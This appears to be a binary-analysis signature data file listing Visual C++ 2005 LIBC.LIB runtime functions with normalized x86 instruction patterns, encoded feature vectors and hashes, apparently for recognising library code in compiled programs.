+_towlower,"PUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",6jKEuDSFtA41eAEyqNKy1wAAAAAAAAAAjCtEiAAAAAAAAAAAJAPDneoyhLjqMoS4OmU1PAAAAAAAAAAAjCtEiAAAAAAAAAAA6jKEuDplNTzqMoS48uGvmCQDw52o0rLX6jKEuDplNTwpwCPQNXgBMjSFtA6MK0SINIW0DjplNTyMK0SIKcAj0AAAAAAAAAAA,[],19def651f7cc11c2018b889f72112e4cdf0c9097,VS2005,LIBC.LIB
+__wgetcwd,"PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",c+sRrAAAAAAAAAAA,hRq1beQO4CGIXCPr3xPA5UKhPzpyE5fLQqE/Ok6gi7EAAAAALlW5/t8TwOXfE8DlB7YzpuudzdcuVbn+5A7gIeudzdcHtjOmpRbQ1XLoOkUAAAAA3xPA5TpPJrBwKio/653N1wAAAAAAAAAAiFwj66UW0NXE92TBTqCLsQAAAAAAAAAAchOXy+udzdcAAAAAGaZm/+udzdcAAAAAxPdkweudzdcAAAAAcug6ReudzdcHtjOmcCoqP0KhPzoZpmb/Ok8msEKhPzoZpmb/,c685ccbbfd87d94a60e492c3ca0772faca7344eb,VS2005,LIBC.LIB
+__wgetdcwd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,R32\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nTEST R32,R32\nJCC CONST",Ok8msEKhPzoZpmb/LlW5/t8TwOXfE8DlGaZm/ybu4WUAAAAA3xPA5UKhPzpyE5fL5A7gISbu4WUHtjOm3xPA5TpPJrBwKio/Ju7hZU6gi7EAAAAAiFwj66UW0NXE92TBTqCLsQAAAAAAAAAAcCoqP0KhPzoZpmb/chOXyybu4WUAAAAAxPdkwSbu4WUAAAAAcug6RSbu4WUHtjOmhRq1beQO4CGIXCPrB7Yzpibu4WUuVbn+pRbQ1XLoOkUAAAAAQqE/Ok6gi7EAAAAA,[],d0e04634a22fd5e0791ab901204970270d8e2e7d,VS2005,LIBC.LIB
+_ungetc,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR DS:[R32]\nCMP R32,DWORD PTR DS:[R32+CONST]\nJCC CONST",aXCLWYg/D0YAAAAA3LN1WJyGUTjYzQSm2M0EpiSjmVzYzQSmiD8PRj/DesUAAAAA2M0EpiSjmVychlE4Jw91Emlwi1mmXjQGnIZROCSjmVzlEIMEnIZROGuQDd2c8bqtUwg4bSSjmVzcs3VYpl40Bog/D0blEIME5RCDBCcPdRIAAAAAnPG6rScPdRKchlE45RCDBCSjmVwAAAAAa5AN3ScPdRKchlE4JKOZXD/DesUAAAAAP8N6xQAAAAAAAAAA,[],cac950ef04619ffd0f2660be6ad370bb174bee5d,VS2005,LIBC.LIB
+__snprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32",653N1wAAAAAAAAAA/gc2HuudzdcAAAAA6PyG+P4HNh43XfGVN13xleudzdcAAAAA,[],55adc2556a7a3636ed13d7d06e32b11fd1f6c6e9,VS2005,LIBC.LIB
+_vfprintf,"MOV R32,R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,R32\nPOP R32\nPOP R32\nPOP EBP",6L75mAAAAAAAAAAAhWKt9+i++ZgAAAAA,[],1b59e1321d8e91ebd615a314787273b68d24ef54,VS2005,LIBC.LIB
+__getdrive,"MOVZX R32,BYTE PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nSUB R32,CONST",653N1wAAAAAAAAAAWf48OuudzddclgqBXJYKgeudzdcarNd7GqzXe+udzdcAAAAA,[],db089925d1a36beb1db626e43d1407590bf97c3a,VS2005,LIBC.LIB
+__chdrive,"AND BYTE PTR SS:[EBP+CONST],0\nADD R8,CONST\nMOV BYTE PTR SS:[EBP+CONST],R8\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV BYTE PTR SS:[EBP+CONST],CONST\nCALL DWORD PTR DS:[0]\nTEST R32,R32",xPdkwcK8QFYAAAAAwChhmcT3ZMG7tlwsT4vMCgAAAAAAAAAAu7ZcLMT3ZMF40nrMu6KzOcK8QFYAAAAAeNJ6zLuiszlPi8wKwrxAVgAAAAAAAAAA,[],b0562ea9b0c356c5935b91eccc58f3c87dd683a5,VS2005,LIBC.LIB
+??_N@YGXPAXIHP6EX0@Z1@Z,"PUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nINC DWORD PTR SS:[EBP+CONST]\nJMP SHORT CONST",9odS4oOuQ14AAAAAGh3NMQAAAAAAAAAAi39QNYOuQ14AAAAAg65DXhodzTH2h1Li,[],93d886166c6c7f89653cbfb9385884d1228b7bcb,VS2005,LIBC.LIB
+__searchenv,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nMOVSX R32,BYTE PTR SS:[EBP+R32+CONST]\nLEA R32,DWORD PTR SS:[EBP+R32+CONST]\nCMP R32,CONST",crsebEL41tYz16Hu0QtDnXqjxjUAAAAAeqPGNe772nSp3V25Bvj00e772nRalNKx7vvadEL41tYAAAAAu7ZcLLD5uNa7tlwsM9eh7kL41tYAAAAA8JNlKwb49NFyux5sQvjW1gAAAAAAAAAAu7ZcLLD5uNaIPcwHiD3MB7D5uNYAAAAAsMpbYEL41tYAAAAAWpTSsXqjxjUAAAAAqd1due772nTDeRM6sPm41tELQ51QqePcUKnj3LDKW2DRC0Odw3kTOrD5uNa7tlws,[],25829014c59793ccd295ef469393e4cca195ef87,VS2005,LIBC.LIB
+__mbsncoll,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",cMiU5LcQvGpPi8wKMXhCcAAAAAAAAAAAT4vMCgAAAAAAAAAAwrxAVgAAAAAAAAAAtxC8asK8QFYxeEJw,[],2bfd0df93252783107ac29b4d7f752e120e2f488,VS2005,LIBC.LIB
+__wspawnvp,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,Ks8cOUYMn8Aqzxw5iadNsxHs5BPqMoS46jKEuBHs5BOgrviNHBM20z4tmf6Jp02zAGRiSz4tmf4kA8OdPi2Z/kYMn8AAAAAAShLDdXqjxjUAAAAATzfyTEYMn8Aqzxw56jKEuD4tmf4Ws3TCFrN0wiCXs5rqMoS4RgyfwAAAAAAAAAAA6jKEuD4tmf4gl7OaeqPGNT4tmf4cEzbTKs8cOUYMn8BKEsN1JAPDnSCXs5ruvJZbEezkEz4tmf4AZGJLzQZvFkYMn8DRSJSl7ryWWxazdMLqMoS4oK74jRHs5BMAAAAAIJezmnqjxjUAAAAA0UiUpUYMn8BPN/JM,d0c20b0edbcffcc71a7897b9629c008cb22b5ff5,VS2005,LIBC.LIB
+__heap_term,"PUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nPUSH EBP\nMOV EBP,DWORD PTR DS:[0]\nJCC CONST",E/xOWgAAAAAAAAAA03lD4tN5Q+JcFUGMjjSBiRP8Tlou4ubjLuLm49N5Q+JcFUGMXBVBjAAAAAAAAAAA,[],67e430fd3ae3f8d1010955ad233356345278faf4,VS2005,LIBC.LIB
+__heap_init,"XOR R32,R32\nPUSH CONST\nCMP DWORD PTR SS:[ESP+CONST],R32\nPUSH CONST\nSETE R8\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32",Ug74tAAAAAAAAAAArGJag1LONpVSaOpbI4qHQgAAAAAAAAAAUmjqW1IO+LQjiodCUs42lQAAAAAAAAAA,[],abd5b10928220db1b531eb25bc1139f76d32e33f,VS2005,LIBC.LIB
+__wfopen,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,UmjqW+uFKkwBoXWzAaF1swAAAAAAAAAA64UqTAAAAAAAAAAA,aa38967ac3e6163c92b4935f49cf7d06611b255b,VS2005,LIBC.LIB
+__wfsopen,"PUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",UmjqW+uFKkwBoXWzAaF1swAAAAAAAAAA64UqTAAAAAAAAAAA,[],04ed7ef29bdc0538d420b30b96357921c6319604,VS2005,LIBC.LIB
+__aullshr,"MOV R32,R32\nXOR R32,R32\nAND R8,CONST\nSHR R32,R8\nRETN",W9AV4MR0sE9b0BXg5EobvwAAAAAAAAAAxHSwTwAAAAAAAAAAjZfqvwAAAAAAAAAAW9AV4ORKG7+Nl+q/,[],7abc6021d09ea11c9df07eae3fd3a0afa9546f5b,VS2005,LIBC.LIB
+_swprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nDEC DWORD PTR SS:[EBP+CONST]\nJCC CONST",60urhKHx2Tl2yGOLofHZOSaaaqQ3XfGV653N1wAAAAAAAAAA3xPA5SaaaqQ3XfGVN13xleudzdcAAAAAdshji98TwOUAAAAAJppqpAAAAAAAAAAA,[],49365a48f8ccb561096c0668501e3da510720dbb,VS2005,LIBC.LIB
+__mbbtype,"MOV R8,BYTE PTR DS:[R32+CONST]\nAND CONST,CONST\nNEG R8\nSBB R32,R32\nAND CONST2,CONST\nDEC R32\nRETN",W9AV4FLONpWbkFD8a+yPhZ+TcONSDvi0Us42lQAAAAAAAAAAeKp9ZAAAAAAAAAAAUg74tAAAAAAAAAAAm5BQ/AAAAAAAAAAAn5Nw41LONpVb0BXglba2ZXiqfWRr7I+F,[],544e8dddf4f4f11898134d21d1f43a2a84f4329b,VS2005,LIBC.LIB
+__mbsnbset,"PUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nPUSH R32\nSHR R32,CONST\nCMP R8,R8\nPUSH R32\nJCC CONST",k496Bt6EbMRrHDYe/NQrLRBvY/IJ809q3oRsxEFF0BtBRdAbQUXQG/zUKy0AAAAA/NQrLWxosLMnRqqeCfNPahBvY/KsYtqEaxw2HgAAAAAAAAAAJ0aqnmxosLNCsxj/rGLahPzUKy0AAAAAQrMY//zUKy0AAAAAQUXQG/zUKy0AAAAA/NQrLWxosLMnRqqeEG9j8mxosLMAAAAAbGiwswAAAAAAAAAAJ0aqnmxosLP81Cst,[],7b0cf843fc051d26144d7c4215bd4c11b758d9d0,VS2005,LIBC.LIB
+__vsnwprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32",/gc2HuudzdcAAAAAE1R2zv4HNh52yGOL/gc2Ht8TwOUAAAAA653N1wAAAAAAAAAA3xPA5f4HNh43XfGVN13xleudzdcAAAAAdshji98TwOUAAAAA,[],0a979591ac0a57f6e443cd6ad277150a95891d08,VS2005,LIBC.LIB
+___init_time,"PUSH CONST\nPUSH CONST\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",qkUBfmOxeOv8TQQ4iFwj648/2zA8gszmY7F460+LzAoAAAAA/E0EOIhcI+u0bZIRT4vMCgAAAAAAAAAAPILM5rRtkhEAAAAAtG2SEQAAAAAAAAAAjz/bME+LzAoAAAAA,[],962a8b664df9f4e0bece8f42cf9d710f8a8dc94b,VS2005,LIBC.LIB
+__allrem,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nXCHG R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nJCC CONST",4XZcoLYU/3IAAAAAgktfFIJLXxQ5rLBpIYd5Y94n1t6chlE43Yu8ZBY4CCIAAAAAthT/cgAAAAAAAAAAnIZRON4n1t46pKQ0OqSkNN4n1t4AAAAAOaywaTqkpDSchlE4waZXBnLoOkUAAAAAXqODJ7YU/3IAAAAAo3oaO4JLXxQAAAAAcug6RaN6GjtUq3JCVKtyQuF2XKBeo4Mnkf0uQhY4CCLdi7xknIZRODqkpDQhh3ljFjgIInLoOkXBplcG3ifW3rYU/3Lhdlyg,[],9a6d6c11365ed035bc4c0ee38f3ca98ac2c420c2,VS2005,LIBC.LIB
+__loaddll,PUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nRETN,7AikZQAAAAAAAAAA,[],be3b173159f166d7ab0055de0233f7eeaf25ce5c,VS2005,LIBC.LIB
+__unloaddll,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",Us42lQAAAAAAAAAAfkA88AAAAAAAAAAA+RqFzVLONpV+QDzw,[],d7c9b2b62c7371c4d49af9ff944e17d0ad76faa6,VS2005,LIBC.LIB
+__flushall,PUSH CONST\nCALL CONST\nPOP R32\nRETN,ojBH2AAAAAAAAAAA,ij64nJ4SPpNGk6MEW9AV4NOwAxwFa6+3zSwRps0sEaYFa6+3Ju7hZTlafGAAAAAAOVp8YAAAAAAAAAAABWuvt9OwAxyJodm6BWuvt9OwAxzo/oHQRpOjBNOwAxzuj+9oiaHZukaTowSeEj6T07ADHEaTowSeEj6T6P6B0NOwAxwAAAAAzSwRptOwAxxb0BXg7o/vaNOwAxzNLBGmnhI+kzlafGAm7uFl,8fe4e917c7a7c530eddb640ef64a57cb05908e36,VS2005,LIBC.LIB
+_fflush,"PUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nNEG R32\nPOP R32\nPOP R32\nSBB R32,R32\nRETN",iFwj6ycPdRLCvEBWT4vMCgAAAAAAAAAAwrxAVgAAAAAAAAAAkTDPGIhcI+sgmH+yJw91Ek+LzAoFNHwkBTR8JAAAAAAAAAAAIJh/sgAAAAAAAAAA,[],7854c1a85f1b8e45934debde792bef7d76f3efe5,VS2005,LIBC.LIB
+__flush,"PUSH R32\nPUSH R32\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nADD ESP,CONST\nCMP R32,R32\nJCC CONST",6jKEuA1mKaTBgLvRhHCHHQ1mKaTMkPz8wYC70Q1mKaQPOdpqzJD8/A1mKaQAAAAAhe7l0A1mKaTqMoS4maKxBw1mKaQAAAAADznaapmisQeEcIcdDWYppAAAAAAAAAAA,[],2674bd52851b1fae0bd7ec87d352d4cf1cbb3fc5,VS2005,LIBC.LIB
+__longjmpex,"PUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,0\nJCC CONST",uqBeBLu2XCzqhc8bjJdPev8IKWK06Chhu7ZcLOmQYbyMl096tOgoYf8IKWIuVbn+6ZBhvAAAAAAAAAAA6oXPG+mQYbyMl096/wgpYgAAAAAAAAAALlW5/umQYbxNdd6iNRZyE7qgXgQAAAAATXXeoumQYbwAAAAA,[],c0a2a509f09411daa95c0633d8167577629a4d14,VS2005,LIBC.LIB
+_strspn,"MOV R32,DWORD PTR SS:[EBP+CONST]\nOR R32,CONST\nNOP\nINC R32\nMOV R8,BYTE PTR DS:[R32]\nOR R8,R8\nJCC CONST",qrQZrxaROXqy9Rz5j+LO/dprW0bVkOPrsvUc+QAAAAAAAAAA1ZDj64/izv0AAAAA5qY8cdprW0bVkOPr2mtbRrL1HPmqtBmvFpE5erL1HPmqtBmv,[],459f50bb32c3cf71d21b65d33a8f28aeef26ed29,VS2005,LIBC.LIB
+_strncat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",l9p7lHas6uweA4bKHgOGytiQfKQAAAAA2JB8pAAAAAAAAAAAQ1BuJAAAAAAAAAAA8BrWpAAAAAAAAAAAhHCHHW3vck/YzQSmiIgyDi0M2vYJZjbU2M0EpsSSpmjoVavaCWY21IiIMg7YzQSm6FWr2sSSpmjoVava6FWr2jUpQDLo/oHQ6P6B0DwKGl0AAAAAxJKmaDwKGl0AAAAAxJKmaDwKGl0AAAAA2M0EpvAa1qTYzQSmbe9yT1ylOYktDNr22M0EpldQjb5Y2ig6PAoaXVylOYktDNr2WNooOhf0rs9Y2ig6WNooOlylOYktDNr2WNooOoiIMg4QAa5nLQza9glmNtReo4MnEAGuZwAAAAAAAAAA9IuYKENQbiQuwcL9BRzv7x4DhspY2ig6F/SuzwAAAAAAAAAALsHC/TUpQDJcpTmJLQza9glmNtQtDNr2V1CNvgAAAAAAAAAAXqODJy0M2vYAAAAAXKU5iej+gdBY2ig6LQza9h4Dhsp2rOrsWNooOlylOYk1KUAydqzq7NiQfKSX2nuUXKU5ifAa1qQFHO/vNSlAMjUpQDKEcIcd,[],1d7f611e78667b74697a67a3e9eea98ba64200e1,VS2005,LIBC.LIB
+__rmtmp,"PUSH R32\nCALL CONST\nPOP R32\nINC R32\nINC R32\nCMP R32,DWORD PTR DS:[0]\nJCC CONST",24n140aTowTVfx4cRpOjBNOwAxwnD3US1X8eHAAAAAAAAAAA07ADHEaTowTVfx4cJw91EtOwAxychlE4xSgL/9V/HhxGk6MEnIZRONOwAxzbifXj,[],616b4a25c950128ab71e33e2526305ae45a4ac2f,VS2005,LIBC.LIB
+___tzset,CALL CONST\nINC DWORD PTR DS:[0]\nRETN,JAPDnQGhdbPpuSh36bkodwAAAAAAAAAAAaF1swAAAAAAAAAA,[],1ec51ee62fdc9ca890fdd70782d8bfc394883948,VS2005,LIBC.LIB
+__tzset,"INC R32\nPUSH R32\nCALL CONST\nIMUL R32,R32,CONST\nPOP R32\nMOV R32,DWORD PTR DS:[0]\nADD R32,R32\nMOV DWORD PTR DS:[0],R32",rCs55Za00yvf6hBM2M0EpnLoOkXo/oHQ6P6B0I/izv0AAAAAPLp/k5a00yvf6hBMcug6RXmMIt3pcpgdWLKRBI/izv0AAAAA6XKYHXmMIt0AAAAASO/qdI/izv0AAAAAS6l9YDy6f5Oijm4KeYwi3RwPr5UNBzPu4Y/fUpIUImtLqX1gCt85R5IUImsAAAAAS6l9YBRZHMesX3gFvuWjPpIUImtUnYuFDQcz7pIUImsAAAAAj+LO/ej+gdDYzQSmrF94BZIUImsUWRzH2M0EphTEiGrYzQSm2M0EphTEiGro/oHQ6P6B0I/izv0AAAAAFMSIanLoOkUs0PYRVJ2LhXBUdGrzwgOMFFkcx5IUImvRYpcxLND2EY/izv0AAAAAHA+vlZIUImsAAAAA3+oQTJa00ythashzkhQiawAAAAAAAAAAYWrIc9W1AOAAAAAAFMSIanLoOkVDHAKUlrTTKxwPr5UqoUd0j+LO/RTEiGrYzQSm88IDjDy6f5NLqX1g1bUA4BwPr5UqoUd02M0EphTEiGro/oHQ6P6B0I/izv0AAAAA0WKXMUjv6nRYspEEcFR0ajy6f5NLqX1gQxwClI/izv0AAAAANQtMGeGP31K+5aM+oo5uCqwrOeUAAAAAj+LO/XLoOkXYzQSmKqFHdBwPr5UK3zlH,[],fb43b2e534637ba18f2124655c29b26b5399ad6e,VS2005,LIBC.LIB
+__isindst,"MOV R32,DWORD PTR DS:[R32+CONST]\nIMUL R32,R32,CONST\nADD R32,DWORD PTR DS:[R32+CONST]\nIMUL R32,R32,CONST\nADD R32,DWORD PTR DS:[R32]\nIMUL R32,R32,CONST\nCMP R32,R32\nJCC CONST",4OlmbvMSRyg0YEdkkYzwSnLoOkWHo219NGBHZDeiAc+u9+LBh6NtfWZ5MTWHo219K5EcuJGM8EoAAAAAh6NtfWZ5MTVy6DpFcug6RbQpcjRy6DpFcug6RbQpcjQm7uFlJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAcug6RSbu4WVy6DpFYxqxTJGM8EoAAAAAcug6RSbu4WVy6DpFcug6RbQpcjSHo219h6NtfWZ5MTW0KXI0rvfiwReC+nIAAAAA3ik7jWMasUwAAAAAtClyNFGp7Ji64tKj1R2tOcKtIoFmeTE1N6IBz94pO40rkRy48xJHKHLoOkWHo219ZnkxNTlafGAAAAAAuuLSow3MwAEAAAAAwq0igeDpZm6unAFOF4L6ct4pO40rkRy4DczAATlafGAAAAAAUansmA3MwAEAAAAArpwBTpGM8Erg6WZu,[],1e912c9c41b2b890b60315036e410a13bcaaa1f1,VS2005,LIBC.LIB
+_fputws,"PUSH DWORD PTR SS:[ESP+CONST]\nMOV R16,WORD PTR DS:[R32]\nINC R32\nPUSH R32\nINC R32\nCALL CONST\nPOP R32\nCMP R16,CONST",uQ7KpAAAAAAAAAAAJKOZXLkOyqQAAAAAFqIeEPzUKy0AAAAAsPk7OPzUKy0ko5lc/NQrLbkOyqSw+Ts4,[],9f5e43e2875bdbe6975584ddfeb863a3a304876d,VS2005,LIBC.LIB
+__mbctoupper,"MOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST\nMOV BYTE PTR SS:[EBP+CONST],R8\nMOVZX R32,R8\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",Pi95kKqYhDVlug6CqpiENSbu4WUjsvDFNBHmsybu4WUv7pjqI7LwxU6gi7EAAAAAZboOgibu4WU0EeazL+6Y6k6gi7EAAAAAJu7hZU6gi7EAAAAATqCLsQAAAAAAAAAA,[],f50fbcc3551d10b9172fa40c153beec39ca9632d,VS2005,LIBC.LIB
+__strerror,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND BYTE PTR DS:[0],0\nPUSH R32\nMOV R32,0\nTEST R32,R32\nJCC CONST",x9px6AAAAAAAAAAAe/k9JwAAAAAAAAAAThTbcsfacehy6DpFFMSIak4U23IqjiOtKo4jrcfacehy6DpFcug6RXv5PSfH2nHoOD7Mmk4U23IUxIhq,[],5ae1629065ccb47efea23b354a4236d8d4d195d5,VS2005,LIBC.LIB
+_rename,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",CKQNQAAAAAAAAAAA0RRGFCbu4WWVUBzMUs42lQAAAAAAAAAAlVAczHLoOkUAAAAAJu7hZXLoOkUAAAAAcug6RVLONpUIpA1A,[],92326d4f664371849591d7d1314580c2ba40c88d,VS2005,LIBC.LIB
+__ismbclower,"MOV R8,BYTE PTR DS:[R32+CONST]\nAND R8,CONST\nSUB R8,CONST\nNEG R8\nSBB R32,R32\nINC R32\nLEAVE\nRETN",ybuSWAAAAAAAAAAAT+el+gAAAAAAAAAAa0R6qK3k4gms37PmrN+z5gAAAAAAAAAAreTiCazfs+bP62Icz+tiHKzfs+YnD3US3WlkKU/npfprRHqoJw91Eqzfs+bJu5JY,[],bb5627cae0ce64b24e2e99bf789515732d5ebc35,VS2005,LIBC.LIB
+__wexecvp,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,oK74jRHs5BMAAAAAuZvuqos2Az0AAAAAUr+HnI9vuGQ6oDUkizYDPQAAAAAAAAAAOqA1JIs2Az2Pb7hkEezkE7mb7qrA/6zUj2+4ZIs2Az2kKqSRwP+s1LXl4lDuvJZbpCqkkYs2Az0bLlt/l9dsyYs2Az3AM1YKGy5bfzdDw9XqMoS47ryWWxazdMLqMoS46jKEuDdDw9V1V5C6dVeQujdDw9VfanLE6jKEuLmb7qoWs3TCFrN0wrXl4lDqMoS4X2pyxBsuW38AAAAAwDNWCos2Az3AM1YK6jKEuLmb7qq15eJQN0PD1RHs5BPqMoS4teXiULmb7qqmdMRspnTEbBsuW3+5m+6qwDNWCos2Az1Sv4ec6jKEuBHs5BOgrviN,48684e913a5fff862e7f45666ae48ce40ee7eddd,VS2005,LIBC.LIB
+__ms_p5_mp_test_fdiv,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR DS:[0]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR DS:[0]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",ybuSWAAAAAAAAAAAXW169gAAAAAAAAAAS670BjUWchPGbCIyrN+z5gAAAAAAAAAANRZyExGLWiIAAAAAEYtaIqzfs+bJu5JYxmwiMjUWchNdbXr2,[],b4180758599481753ec2324c35aaddea9bf06e01,VS2005,LIBC.LIB
+__ms_p5_test_fdiv,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR DS:[0]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR DS:[0]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",ybuSWAAAAAAAAAAAEYtaIqzfs+bJu5JYrN+z5gAAAAAAAAAA,[],62c45612e2210babdc8ad850f9e8dd5286eb507d,VS2005,LIBC.LIB
+__wexecv,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,xJKmaEL41tYAAAAAsuLUZbER8QQAAAAA8dbHQPQ42DYAAAAAsRHxBO0Pv99Lfz7Wcug6RSbu4WVy6DpFcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4MnTQTaVnLoOkXpXXtoXqODJ8KaPa0AAAAA7Q+/38KaPa0AAAAA6V17aHLoOkUAAAAAwpo9rXLoOkUAAAAAcug6RfQ42DYSoox5cug6RUFF0Bu5m+6quZvuqkFF0BsAAAAAQRv/gLLi1GXEkqZoQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAQRv/gMSSpmjx1sdAEqKMefQ42DZBG/+A,48684e913a5fff862e7f45666ae48ce40ee7eddd,VS2005,LIBC.LIB
+__mbscpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",q15nETwKGl0AAAAAWNooOhuBMI1eo4Mnyhy8QVylOYleo4MnHZ+F0B2fhdDYzQSm2D80UAAAAAAAAAAAG4EwjQAAAAAAAAAAXqODJwlmNtQAAAAA2M0Eptg/NFDYzQSmPAoaXQlmNtRcpTmJDeHVCwAAAAAAAAAA2M0EpivFawtY2ig6CWY21B2fhdDYzQSmWNooOg3h1QtY2ig6XqODJx2fhdAAAAAAXKU5idg/NFDKHLxBK8VrCwAAAAAAAAAA,[],495651d2f98cf30b9a3a7c8a38651d0ffd0d9562,VS2005,LIBC.LIB
+__mbscat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",XKU5iRFkM4NY2ig6WNooOlylOYk1KUAyEWQzgzwKGl0AAAAANSlAMjUpQDKEcIcd2M0Eptg/NFDYzQSm2M0EpivFawtY2ig6WNooOg3h1QtY2ig6WNooOhuBMI1eo4MnhHCHHfdmXi/YzQSmXqODJz/fYOsAAAAAG4EwjQAAAAAAAAAA2M0EphFkM4PoVava6FWr2hFkM4PoVavaDeHVCwAAAAAAAAAA6FWr2hFkM4Neo4MnXqODJzUpQDIAAAAAK8VrCwAAAAAAAAAAEWQzgzwKGl0AAAAA2D80UAAAAAAAAAAAEWQzgzwKGl0AAAAA92ZeLzwKGl0AAAAAPAoaXQlmNtRcpTmJXKU5idg/NFDKHLxByhy8QVylOYleo4MnXqODJwlmNtQAAAAAK/LdbzUpQDJcpTmJP99g6wlmNtQAAAAACWY21D/fYOvYzQSm,[],eff1931bfa247696974be1895164f4592e45aefc,VS2005,LIBC.LIB
+__wcsrev,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nMOV R32,R32\nMOV R16,WORD PTR DS:[R32]\nINC R32\nINC R32\nTEST R16,R16",P8N6xQAAAAAAAAAAAOHWawAAAAAAAAAAYU0sqQDh1msjQMHWI0DB1kAOB/s/w3rFQA4H+0AOB/s/w3rFsZYP8NgUC7hhTSyp2BQLuNgUC7hhTSyp,[],76a4c022d20c19fcc9f789eae1d75e9caec97478,VS2005,LIBC.LIB
+__mbsnbcpy,"LEA R32,DWORD PTR DS:[R32+CONST]\nXOR R32,R32\nMOV R32,R32\nSHR CONST,CONST\nREP STOS DWORD PTR ES:[R32]\nMOV R32,R32\nAND CONST2,CONST\nREP STOS BYTE PTR ES:[R32]",xcHu9j/DesUAAAAAnsXEIVgrj1ZMIaXPcug6RYYKYV5eo4MnXqODJxMYepIAAAAAXqODJ3LoOkUAAAAAWCuPVhMYepIAAAAA2aA2k+GPNi09Q7oPQUXQGz/DesUAAAAA3NgTIRMYepIAAAAATCGlz9zYEyFeo4MnP8N6xQAAAAAAAAAAExh6kkFF0BsV3juIPUO6D8XB7vYAAAAAQUXQG4YKYV4AAAAAhgphXjTg+sKexcQh4Y82LRMYepJBRdAbFd47iEFF0BsAAAAANOD6whMYepJy6DpF,[],c2e0696a1499c9c17562d2564b9df2b68060e5a3,VS2005,LIBC.LIB
+__getpid,JMP DWORD PTR DS:[0],fkA88AAAAAAAAAAA,[],3aefa5c151ddda10ebefb209835c6b2880c96ec2,VS2005,LIBC.LIB
